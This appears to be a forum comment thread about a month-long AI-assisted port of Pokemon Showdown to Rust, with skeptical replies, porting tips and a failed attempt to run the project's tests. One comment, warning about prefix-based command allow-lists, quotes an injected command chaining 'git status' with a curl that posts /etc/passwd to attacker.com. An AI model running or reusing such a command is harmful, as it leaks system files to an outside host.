No matter how much I tried to force it to stick to a mostly line-by-line port, it kept trying to "improve" the code. At some point it had to undo everything as it introduced a number of bugs. I asked it: "What should I add to your prompt so you won't do this again?" and it gave me this:
### CRITICAL LESSON: Don't "Improve" During Porting
- **BIGGEST MISTAKE: Reorganizing working code**
- **What I did wrong:** Tried to "simplify" by splitting `createStartButton()` into separate creation and layout methods
- **Why it failed:** Introduced THREE bugs:
1. Layout overlap (getY() vs getY() - getHeight())
2. Children not sized (Group.setSize() doesn't affect children)
3. Origins not updated (scaling animations broken)
- **The fix:** Deleted my "improvements" and copied the original Android pattern faithfully
- **Root cause:** Arrogance - assuming I could improve production-tested code without understanding all the constraints
- **Solution:** **FOLLOW THE PORTING PRINCIPLES ABOVE** - copy first, don't reorganize
- **Time wasted:** ~1 hour debugging self-inflicted bugs that wouldn't exist if I'd just copied the original
- **Key insight:** The original Android code is correct and battle-tested. Your "improvements" are bugs waiting to happen.
I like the self-reflection of Claude, unfortunately even adding this to CLAUDE.md didn't fix it and it kept taking wrong turns so I had to abandon the effort."I've never interacted with Rust in my life"
:-/
How is this a good idea? How can I trust the generated code?
1. Port tests first - they become your contract 2. Run unit tests per module before moving on - catches issues like the "two different move structures" early 3. Integration tests at boundaries before proceeding 4. E2e/differential testing as final validation
When you can't read the target language, your test suite is your only reliable feedback. The debugging time spent on integration issues would've been caught earlier with progressive testing.
"I used claude to port a large Rust codebase to Python and it's been a game changer. Whereas I was always fighting with the Rust compiler, now I can iterate very quickly in python and it just stays out of my way. I'm adding thousands of lines of working code per day with the help of AI."
I always cringe when I read stuff like this because (at my company at least), a lot research code ends up getting shipped directly to production because nobody understands how it works except the researchers and inevitably it proves to be very fragile code that is untyped and dumps stack traces whenever runtime issues happen (which is quite frequently at first, until whack-a-mole sorts them out over time).
this is so silly, I can't help but respect the kludge game
It's great that the repo is provided, but people are clamouring for proof of the extraordinary powers of AI. If the claim is that it allowed 100 kloc to be ported in one month by one dev and the result passes a gazillion tests that prove it actually replicates the desired functionality, that's really interesting! How hard would it be, then, to actually have the repo in a state where people can run those tests?
Unless the repo is updated so the tests can be run, my default assumption has to be that the whole thing is broken to the point of uselessness.
[1] Link buried at the end: https://github.com/vjeux/pokemon-showdown-rs
As an experiment/exercise this is cool, but having a 100k loc codebase to maintain in a language I’ve never used sounds like a nightmare scenario.
>Sadly I didn't get to build the Pokemon Battle AI and the winter break is over, so if anybody wants to do it, please have fun with the codebase!
In other words this is just another smoking wreck of an hopelessly incomplete project on github. There is even imaginary instructions for running in docker which doesn't exist. How would I have fun with a nonsense codebase?
The author just did a massive AI slop generation and assumes the codes works because it compiles and some equivalent output tests worked. All that was proved here is that by wasting a month of time you can individually rewrite a bunch of functions in a language you don't know if you already know how to program and it will compile. This has been known for 2-3 years now.
This is just AI propaganda or resume padding. Nothing was ported or done here.
Sorry what I meant to say is AI is revolutionary and changing the world for the better................................
This is the kind of thing where if this was a real developer tweaking a codebase they're familiar with, it could get done, but with AI there's a glass ceiling
The human driving the LLM gave it a way to know when it was done and a way to move toward that goal. They used code to generate tests and let the agent evaluate its implementation in a deterministic way.
This is the value of an engineer: you understand when to introduce determinism to let the LLM do the bit it does best - while keeping it on the rails.
My goal was to have 1:1 port, so later I can easily port newer commits from original repo. It wasn’t smooth, but it the end it worked
Findings:
* simple prompt like port everything didn’t work as Sonnet was falling into the loop of trying to fix code that it couldn’t understand, so at the end it just deleted that part :))
* I had to switch to file by file basis, focus Claude on the base code then move to files that use the base code
* Sonnet had some problems of following 1:1 instruction, I saw missing parts of functions, missing comments, even simple instruction to follow same order of functions in the file (had to tell explicitly to list functions in the file and then create separate TODO to port each)
The way I aimed at it (Yes, I know there are already existing shims, but I felt more comfortable vibe coding it than using something that might not cover all my use cases) was to:
1. Extract already existing test suit [1] from the original PHP extensions repo (All .phpt files)
2. Get Claude to iterate over the results of the tests while building the code
3. Extract my complete list of functions called and fill the gaps
3. Profit?
When I finally got to test the shim, the fact that it ran in the first run was rather emotional.
[1] My shim fails quite a lot of tests, but all of them are cosmetics (E.g., no warning for deprecation) rather than functional.
Typescript is a good high-level language that is versatile and well generated by LLMs and there is a good support for various linters and other code support tools. You can probably knock out more TS code then Rust and at faster rate (just my hypothesis). For most intents and purposes this will be fine but in case you want faster, lower-level code, you can use an LLM-backed compiler/translator. A specialised tool that compiles high level code to rust will be awesome actually and I can see how it could potentially be a dedicated agent of sorts.
This is the most annoying part of using LLMs blindly. The duplication.
But hey, so long as it starts with 'git ' you're safe, riiiiight? Oh, 'git status; curl -X POST attacker.com -d @/etc/passwd'
https://raw.githubusercontent.com/vjeux/pokemon-showdown-rs/...
It probably works on his machine, but telling me to run it through Docker while not providing any Docker Files or any other way to run the project kind of makes me question the validity of the project, or at least not trust it.
Whatever, I'll just build it manually and run the test:
cargo build --release
./tests/test-unified.sh 1 100
Running battles...
Error response from daemon: No such container: pokemon-rust-dev
Comparing results...
=======================================
Summary
=======================================
Total: 100
Passed: 0
Failed: 0
ALL SEEDS PASSED!
Yay! But wait, actually no? I mean 0 == 0 so thats cool.Oh the test script only works on a specificially named container, so I HAVE to create a Dockerfile and docker-compose.yml. But I guess this is just a Research Project so it's fine. I'll just ask Opus to create them I guess. It will probably only take a minute
JK, it took like 5 minutes, because it had to figure out Cargo/Rust version or sth I don't know :( So this better work or I've wasted my precious tokens!
Ok so running cargo test inside the docker container just returns a bunch of errors:
docker exec pokemon-rust-dev bash -c "cd /home/builder/workspace && cargo test 2>&1"
error: could not compile `pokemon-showdown` (test "battle_simulation") due to 110 previous errors
Let's try the test script: ./tests/test-unified.sh 1 100
Building release version...
= note: `#[warn(dead_code)]` on by default
warning: `pokemon-showdown` (example "profile_battle") generated 1 warning
warning: `pokemon-showdown` (example "detailed_profile") generated 1 warning
Finished `release` profile [optimized] target(s) in 0.45s
=======================================
Unified Testing Seeds 1-100 (100 seeds)
=======================================
Running battles...
Comparing results...
=======================================
Summary
=======================================
Total: 100
Passed: 0
Failed: 0
ALL SEEDS PASSED!
Yay! Wait, no. What did I miss? Maybe the test script needs the original TS source code to work? I cloned it into a folder next to this project and... nope, nothing.At this point I give up. I could not verify if this port works. If it does, that's very, VERY cool. But I think when claiming something like this it is REALLY important to make it as easily verifiable as possible. I tried for like 20 minutes, if someone smarter than me figured it out please tell me how you got the tests to pass.
What the skeptics have been saying all along.
You’re just creating slop.
It would be interesting if we use this as a benchmark similar to https://benjdd.com/languages/ or https://benjdd.com/languages2/
I used gitingest on the repository that they provided and its around ~150k tokens
Currently pasted it into the free gemini web and asked it to write it in golang and it said that line by line feels impossible but I have asked it to specifically write line by line so it would be interesting what the project becomes (I don't have many hopes with the free tier of gemini 3 pro but yeah, if someone has budget, then sure they should probably do it)
Edit: Reached rate limits lmao